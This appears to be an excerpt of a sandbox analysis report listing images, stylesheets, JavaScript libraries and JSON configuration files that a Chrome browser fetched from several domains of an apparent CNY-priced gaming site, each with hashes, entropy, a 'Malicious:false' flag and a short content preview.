                                                                                                                                                          MD5:EF00277A830F44BC4AF5434E41955F40
                                                                                                                                                          SHA1:465EDFA57900DF3F498B85677739B5FF6BEFAD90
                                                                                                                                                          SHA-256:663315C849B61C943D46F2625DAA87FAE6714923DE2FBE4B232A477653423CA3
                                                                                                                                                          SHA-512:5F73125F5ECEF344976D5AFB1D1010F6B0FE8F07066EBA02081669B36EDA0B0F628EBC581DCCDF2E794FDF5E692049FD5E1A247AC2D31567FAF2AA476B6B7DFB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.1 (Windows)" xmpMM:InstanceID="xmp.iid:FF0FA858998711EA979AE2BEFA1347C0" xmpMM:DocumentID="xmp.did:FF0FA859998711EA979AE2BEFA1347C0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FF0FA856998711EA979AE2BEFA1347C0" stRef:documentID="xmp.did:FF0FA857998711EA979AE2BEFA1347C0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>B....../IDATx......5|*t.==..H..sD"..6...5.......^.`...0....d.D.@..Y..g:.T.{oM..eq`.]...y..tWUW.{.y....8..M|._W
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (64201)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):497255
                                                                                                                                                          Entropy (8bit):5.356248248781009
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:1UUEuK5a8lZkP6QUT63i6PSNhwcTxPEzkWVr:1pP6QUT63i6PSNhwkxPpWVr
                                                                                                                                                          MD5:A67923A1C08C02BF3584442C6956DD67
                                                                                                                                                          SHA1:88817CD3E4099BA59711F63026D72C4783404945
                                                                                                                                                          SHA-256:6234565758067301EA96A5BB4B80D9DE7975E0DC06E75AB98D346745AE19549A
                                                                                                                                                          SHA-512:379D23750C6C8893F8ADF9050F0F3C491792D3F805B8AE6CEFF5BFAA3DADE342494768035C9236F4D874A782F0D1A1DEAE31DA9302EAB8257F67369D89630C0D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Preview:.tutorial-body[data-v-e9757988]{min-width:1000px;background:#201b15 url(/pc/image-pc/tutorial/big-bg.jpg) no-repeat bottom;background-size:cover}.tutorial-body [data-v-e9757988],.tutorial-body [data-v-e9757988]:after,.tutorial-body [data-v-e9757988]:before{box-sizing:content-box}.tutorial-body .add-members[data-v-e9757988],.tutorial-body .home[data-v-e9757988]{position:absolute;right:13px;top:50%;transform:translateY(-50%)}.tutorial-body .add-members.home[data-v-e9757988],.tutorial-body .home.home[data-v-e9757988]{right:17px}.tutorial-top[data-v-e9757988]{background:url(/pc/image-pc/tutorial/tutorial-bg.jpg) repeat-x 0 0;height:100px;width:100%;padding:15px 0;border-bottom:3px solid #007989}.tutorial-title[data-v-e9757988]{height:1px;background:#4d4d4d;width:342px;margin:30px auto 0;text-align:center}.tutorial-title h1[data-v-e9757988]{color:#faf4e0;font-size:24px;position:relative;top:-15px;background:#272727;width:154px;margin:0 auto;font-weight:900}.tutorial-main[data-v-e9757988]{wi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17340
                                                                                                                                                          Entropy (8bit):4.823654276338891
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:4Pf+aTbLSlu4NyRs8VDv1KygOdWuTyVC3d7QPXLHOm8cSCl1Ej7bY8l7YJIJvO5N:4Pf+aTbeyM2cXzsjDUfj
                                                                                                                                                          MD5:4DE3E8BCF2F02D60519CA0D3584D3B8E
                                                                                                                                                          SHA1:6323C2BF18B1BBF968E164BDF2E58D7677F67F8A
                                                                                                                                                          SHA-256:6CF6E96F51F13834E233BEE9A9040F6EFF70601DC0B755E60885B20550B35A9F
                                                                                                                                                          SHA-512:113459C7E08EF4D7EAFB6D87ED8BC854CAD70665219F11D05ADA3F0490D4B54BA2B9D691522EA271FA9FE7C35AC086FC8DFD0E757D88DD0D8CAD8E734D123F61
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/js/websocket/Comet.js
                                                                                                                                                          Preview:/**. *. */.function MSiteComet() {.}..MSiteComet.prototype = {.. /** ........ */. SYNCHRONIZE_KEY: "_S_COMET",. /** ........ */. CONNECTION_VALUE: "C",. /** ........ */. DISCONNECT_VALUE: "D",. /** ........ID */. CONNECTIONID_KEY: "_C_COMET",. /** ............ */. SUBSCRIBE_TYPE: "_S_TYPE",. /** ........ */. SUBSCRIBE_VALUE: "R",. /** ........ */. BACK_VALUE: "B",. /** ........key */. BACK_KEY: "_B_COMET",. last_active_time: new Date().getTime(),. url: null,. url_websocket: null,. cid: null,. accept: function (data) {. var message;. if (typeof(data) == "object") {. message = data;. } else {. message = eval("(" + data + ")");. }. if (!(message._S_COMET && message._S_COMET == "S")) {//............ consol
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1128
                                                                                                                                                          Entropy (8bit):5.481804985828627
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilchF7i+3XRH9oH5LxOCE+MIR4QRBRKrfjj:Yv1FLJxwewo9E0ZLxh141z
                                                                                                                                                          MD5:D09B10A7A007BF78EEEB09FA29C8C1AB
                                                                                                                                                          SHA1:0B61E0D1118C5E403CFABEE428A75568CA2E79CC
                                                                                                                                                          SHA-256:ED157AC83CCFD16499961A0B7046F00086E7CDE60E16AA8190220A29A25AAA96
                                                                                                                                                          SHA-512:2259613EDB7C6A3A0C3F22FDAA595C08E25DA559EF73B7A27DE35683493F26791890852703A46946ED12DB80E0FD0307AA15378D41F0B354F8E177577F2538E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', '2bacc0c831e1b000832b0c92c2a0f627');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"uy09","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":"","webPath":"t3685","httpsSupport":0,"analyticsJs":null,"loginLogo":"","name":".....","onlineCustomerServiceUrl":"https://yh1.ywkf89.cc/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/uy09/202108/202108190259527.png","snStatus":1,"webTitle":".......","isMaintain"
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Algol 68 source, Unicode text, UTF-8 text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):117433
                                                                                                                                                          Entropy (8bit):4.883877360637883
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:qOL1yBkBeb9wNoHpH7tjl2Ulwjwaj2BH3fMobEKeYEoZYiMirUw0:qOCWeH70R2BkobE+cw0
                                                                                                                                                          MD5:36C8F828395A9395549BD6E7307CB7E9
                                                                                                                                                          SHA1:F30A4961558E2D3D4405E7D93AA28FDB63245E78
                                                                                                                                                          SHA-256:5D5E32FA1E06A0BC9396F349D142AD248E82086543E438C890E43F41E692DB33
                                                                                                                                                          SHA-512:40C24A9011E1BBDD98BD95B341C400BDAF48FEFD953FCB407368FE3C685AC09196B55E230C03CA9890C35FE9ACEF2C916BED52423DC1A7B532A1DB9817C03A8E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/moment.js
                                                                                                                                                          Preview://! moment.js.//! version : 2.10.3.//! authors : Tim Wood, Iskren Chernev, Moment.js contributors.//! license : MIT.//! momentjs.com..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :. typeof define === 'function' && define.amd ? define(factory) :. global.moment = factory().}(this, function () {... var hookCallback;.. function utils_hooks__hooks () {. return hookCallback.apply(null, arguments);. }.. // This is done to register the method called with moment(). // without creating circular dependencies.. function setHookCallback (callback) {. hookCallback = callback;. }.. function isArray(input) {. return Object.prototype.toString.call(input) === '[object Array]';. }.. function isDate(input) {. return input instanceof Date || Object.prototype.toString.call(input) === '[object Date]';. }.. function map(arr, fn) {. var res = [], i;.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 16 x 19, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1210
                                                                                                                                                          Entropy (8bit):6.58861970219898
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:d1hmYaWwjx82lY2T3XVTfi0msyJ3VTH30I1GSi9n5+b6y1mZNwR:DMYLNn2Dpfvm/J3pHkI10n5i6y1ek
                                                                                                                                                          MD5:D968889F5AE7ABAD67732E77AA08FE65
                                                                                                                                                          SHA1:925BD37C255648CC3D06360696227FA56A2D61EB
                                                                                                                                                          SHA-256:C13DC87E12290A46BC6E0CA1542D972CCD8A3E643D6ED35DA52A38C6C0042821
                                                                                                                                                          SHA-512:E98048504C5613270D1E82B7B58313F366EE130A361A0F8ED67C74C172F08499BC6F1B8537F813A827D1768EEC4CEF99E8E1A3DFBB253FC54F23AE2994F44DF4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/member/icon_pwd_input.png
                                                                                                                                                          Preview:.PNG........IHDR..............g......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:118F5031FFFF11EB92E5AF78098ED89B" xmpMM:DocumentID="xmp.did:118F5032FFFF11EB92E5AF78098ED89B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:118F502FFFFF11EB92E5AF78098ED89B" stRef:documentID="xmp.did:118F5030FFFF11EB92E5AF78098ED89B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..9....*IDATx.b...?.....@...G.x)VU ..&....?@|../.........].(T.q .G......g.3 ...U0<.j..6.....x.`..I.....J.d..^.q<
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15721
                                                                                                                                                          Entropy (8bit):7.951906564348781
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:dKczy4UH/wjIDwYeQYJsBxAHUED+jPNaB7PeeNsGiOhj:oWybH/wjIXJKCgp2N67aVOt
                                                                                                                                                          MD5:CF546C6FD6FFD1448867E707453F53F8
                                                                                                                                                          SHA1:C00AF79E1A3B5BA95D05DC83807403BF12E3BA17
                                                                                                                                                          SHA-256:D2B002C3665CAFB298339F3DADCAAC9595EDC7565F79BFB5602369300ED59426
                                                                                                                                                          SHA-512:298F6272660EF8D487EF7C1106DC0C95392D6F7DB891E4694C6024E8778DC95DD182B00A89AB7FF4E6C72D4AC0038D37AA4049D6C87DE0F5D7C5A7CB2BE8F4D1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D288D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D278D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (64577)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):64651
                                                                                                                                                          Entropy (8bit):5.185204590729394
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:CwJl9VwAdGuMbJVAOi9ee9RjOEe1sdMv5rjITry:Cxb7AdRjOEKhHay
                                                                                                                                                          MD5:B5BC8CD626B389BDE727A91E6CE79436
                                                                                                                                                          SHA1:3DF6C39300AC286CF596B3BDA273CB39FF825429
                                                                                                                                                          SHA-256:A1EB48EEB3B3F2BA41940D3041464F0B386B7A7C4A8ACB42F3017E691F4B116E
                                                                                                                                                          SHA-512:2C1DDE58CE83D9B716919DFC42602AEF3022BE012B3F92E61B17B674303ECBF0B9D308064B6D6C2443CF3E3DFD36BFB332EAB62E64B56BEF0BE801E6F4610F12
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/jquery/jquery.nicescroll.min.js
                                                                                                                                                          Preview:/* nicescroll v3.7.0 InuYaksa - MIT - http://nicescroll.areaaperta.com */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e(require("jquery")):e(jQuery)}(function(e){"use strict";var o=!1,t=!1,r=0,i=2e3,n=0,s=e,l=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||!1}(),a=function(){return window.cancelAnimationFrame||window.webkitCancelAnimationFrame||window.mozCancelAnimationFrame||!1}();l?window.cancelAnimationFrame||(a=function(e){}):(l=function(e,o){var t=(new Date).getTime(),r=Math.max(0,16-(t-lastTime)),i=window.setTimeout(function(){e(t+r)},r);return lastTime=t+r,i},a=function(e){window.clearTimeout(e)});var c=window.MutationObserver||window.WebKitMutationObserver||!1,d={zindex:"auto",cursoropacitymin:0,cursoropacitymax:1,cursorcolor:"#424242",cursorwidth:"6px",cursorborder:"1px solid #fff",cursorborderradius:"5px",scrollspeed:60,mousescrollstep:24,to
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1126
                                                                                                                                                          Entropy (8bit):5.47861213127639
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilchF7i+3XRH9oHWLxOCEjMIR46RBobrfjj:Yv1FLJxwewo9E02Lxhg4Tz
                                                                                                                                                          MD5:0FCFC76F2863B3F97A80CCAB1ED7A393
                                                                                                                                                          SHA1:A159FA6509D02078D8DBF5DF092238373F2F4E17
                                                                                                                                                          SHA-256:2B9E4F979B4313A4B840D0E389778160912A4AFE48FBA16C9C6120EEEB05E489
                                                                                                                                                          SHA-512:C227982C96B89AE084B12F636D0E73BB54B41021F5B64A04D917DA1F560E61F47EC6CDBD9BAD4337EA4003B1583AD801EC233B2FEA7297B8E9CBE8DE4E7377AD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ahd-ocssn.qqxgo.com/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221
                                                                                                                                                          Preview:{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', '2bacc0c831e1b000832b0c92c2a0f627');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"uy09","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":"","webPath":"t4045","httpsSupport":0,"analyticsJs":null,"loginLogo":"","name":".....","onlineCustomerServiceUrl":"https://wns1.ywkf89.cc/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/uy09/202307/202307200237350.png","snStatus":1,"webTitle":"......","isMaintain":0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15676
                                                                                                                                                          Entropy (8bit):7.95677851421634
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:trkksoIK3AL/H1VPrpeCm4uR72goHW11m71bmrvF:trDI0eH1VFeCm4E7IW14YrvF
                                                                                                                                                          MD5:E9D6F1F9FE9BD1A84D160111A694055B
                                                                                                                                                          SHA1:CAEAA79A384502FB99A1ECDC935F484415C025F7
                                                                                                                                                          SHA-256:2D45AA957F5D5C9D8B607977301737CBEC92E1A5BC21EA5C52001E3DC71796E3
                                                                                                                                                          SHA-512:9E044E7AC8DA66289449E26DF7FE3DA44739B37CBBCE9103061750D1760131F9C2297A9DE6FE22869FE16557A283C2EC86676DC312C06A240D6C4AF371FDE973
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/og_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F368D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F358D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31333
                                                                                                                                                          Entropy (8bit):7.990460330358006
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:1DWmiDD0F3/gnqzlLnfgEBN66g+jpP47lV:hcD06qdfJdgG47v
                                                                                                                                                          MD5:4146025B0447B8B592407D04119E7825
                                                                                                                                                          SHA1:7403C962B9B8A795A2150B302C54C2857E37D76E
                                                                                                                                                          SHA-256:29050BBB36C5FE4BE1AC861EF6604DC2344949718C0D8291E4AECAFA09E70230
                                                                                                                                                          SHA-512:C1E6C99ECFD40AADEC57969723B33200CA80E18E932187E8A808BE7B513AF465836BF42E6A6A678306179D90DF5DD15C7E827795A5D86EC684095949C29472CF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D995B19D93A511EC97C2E3310858662A" xmpMM:InstanceID="xmp.iid:D995B19C93A511EC97C2E3310858662A" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3F730346459011EABC77EC84855C7F07" stRef:documentID="xmp.did:3F730347459011EABC77EC84855C7F07"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>)F....v.IDATx..}.|...7u{.V..D.H....\0.....'v.S.O...~yq....%N.w......*.P...J.w....A......{...hvv...}.{.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):37279
                                                                                                                                                          Entropy (8bit):7.990998357157429
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:VjWLXKQYd2Z9X+NiFJiZtIBXAsAhzRAOBGiH4n2BQiZ+Yh0a:YLDZ9X+Ql72RA/iYnT1Da
                                                                                                                                                          MD5:ED8215D9B7270645FED0E644D3D372EB
                                                                                                                                                          SHA1:059E36C409682CDF5DD4CFBF133F69A0395677B5
                                                                                                                                                          SHA-256:E6413408D2F7EDFD869B03C33565FF7103F9892409F4A77FDD74EFB6C0F28256
                                                                                                                                                          SHA-512:E0394829B36AA20756EE038CE2EF774E9A9F9BB62B5D97A3719CEC43794E59268FB0941809CD69D7838A5120BE8BC789C2386F6E479A06D975FE40D851E4F4B0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............ua... .IDATx..}..T............)..b,.X.%.g....41..%..$/.X...FM4j..k..Q...._....>...o....\b~........5k...o.MB.~..%U...b...bp....M.....F.."(.z|....}.U..44..M....C..(.v!%..i.Z.,.o.1....\.1..B...y...j....|..k...~wSf...x..0..*.....-.p..UJ......{..6LQ._.:....z.....G...t.....XL.m.G.y..?..{........?...|9&.....PQ.C-.>...'.....p.Jh.^...q...=0......??.q./F.C..P..hr!D..Q!..]+....W..v..C.7...x...?.y.kM..BA.8...u.OB..H..r_.%..yYGNrh........+...b....Q..f@..K..._L..O.?.l}e..~...._..B{:.........O...e.....A.../.?e.#K..0.B*....nzz9......p..k.d.LCO...].......K.6@.pn..Zl.F*A}_.K.w..S.....|(.>.]..._.q..d..._.W\.O..@..m$..........R.........^.WE.].Q...?.4...._....a.v).^....%........<..g.F......nFD....|..W].d&.._...)_ie+.*..Qq't.A..)G>;.....M.?.&.W.2O]P*.N...pA.g.}.w$eA....fe.r.S...? .*.....f%uZ...3.kw.=....`.....2J.....3kJ.@.)..l..G..C1.....h.....W...O...[.........y8.N.G...*.........".t..x8...+%_Ue.8d.s5.sS....Q..}m.k....'2......h.....$
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1070 x 115, 4-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2435
                                                                                                                                                          Entropy (8bit):7.850978467294237
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:lNeQSR6M9g32kvMlq+E0iG5fksAIWqjYvb:lNzMK3pp+Dim0I2b
                                                                                                                                                          MD5:6F91EAAFA8F4BBEB9BF36FCB434D46C2
                                                                                                                                                          SHA1:1A86DF7329738506E1767369481FBE4371F0AD25
                                                                                                                                                          SHA-256:A08174E369A472431AE048079DA69030011EB02BE72BB35C3A36A4CF93DE28AC
                                                                                                                                                          SHA-512:7C32E0682B71E6322CF6334D092500F28A44841DA31A9722026173A7CC048D617CE6DBE30BFFB91BFFCDA1D540CFCB1D6861985FFF71514F0E1B3F5828B63550
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/games/games_bg.png
                                                                                                                                                          Preview:.PNG........IHDR.......s......^^.....PLTE..........................)IDATx..XMs.H.E$.s...]>.".......9..........[a.&U.&.DA....;.....y|.L..........taa..0]X..,L..........taaa..x]..F.E.~..AFnT.qG~.......".q...,J.o....... .P$..@Y..c../;....(#..@.9..8......T.B?G1>#!P..B.<B..."...."6......H.......0.x7.....!tD..4Uz.B..)....9....).D.P.9J...%..pn....y._Y{...~pn.B.....H..."*..2..s...B...+u.......#ZZ.^...-.....BK...3......_t./..r...6zv.?....D....(*..>_.R.....a}..>.^.g...P..x...K.b..7W.Y...b.. ..6..en...EI).ic....n....zZT*...QY.....->.2..../JlH..F..cY...c..>.e.....}...h.$t.m.......O`].W.]..ZS..*.W....?..{nB.......3..!~..+....*C.%.......m.........'..kB.............BKV.D{........`.SJ.s..d...*U.Y9.'.g.?U.......s&N{..../..={........c..*.l,~..w./...m...{."0]|......",]..y.(.2.........P$.Qq..1.F..H..Q.K.".*..{V.~.rZ.H.s.1.i..Y.B..,|'. .`...v-6O"....}$....{../.GaW.d.../....,_....i8>a.u.....e!9."..$..(.I.P......y.w^./T..6..}....]$.\.{(f..L.T...y..").i.p.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40880
                                                                                                                                                          Entropy (8bit):7.98537476935507
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:U1OPRO+Tc3AWqo9971nh8FlXt+Ygh/IO2ZnM6+IutGgjP10EcUpXwUjCek1:UoPI+owDssy18nMpP27UxT+ek1
                                                                                                                                                          MD5:DA5E9E5D118322052D73D03CF64CDCFE
                                                                                                                                                          SHA1:3CEF17F8EED4CCA0D106628D2A6CA3BF15453B3E
                                                                                                                                                          SHA-256:ECB641652E68070F7227B082024D72F6EF1D6EEB5E8E92B4DEEEA578F2A1825D
                                                                                                                                                          SHA-512:75DC60BD2A855D7CFE62B37950793FD90C201E5942319F362F2CC7D1B64FC81A65235622AA4C8040601B60FD03C433A2FA3F7CE4249D3A4B02DC0B52D742E1E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
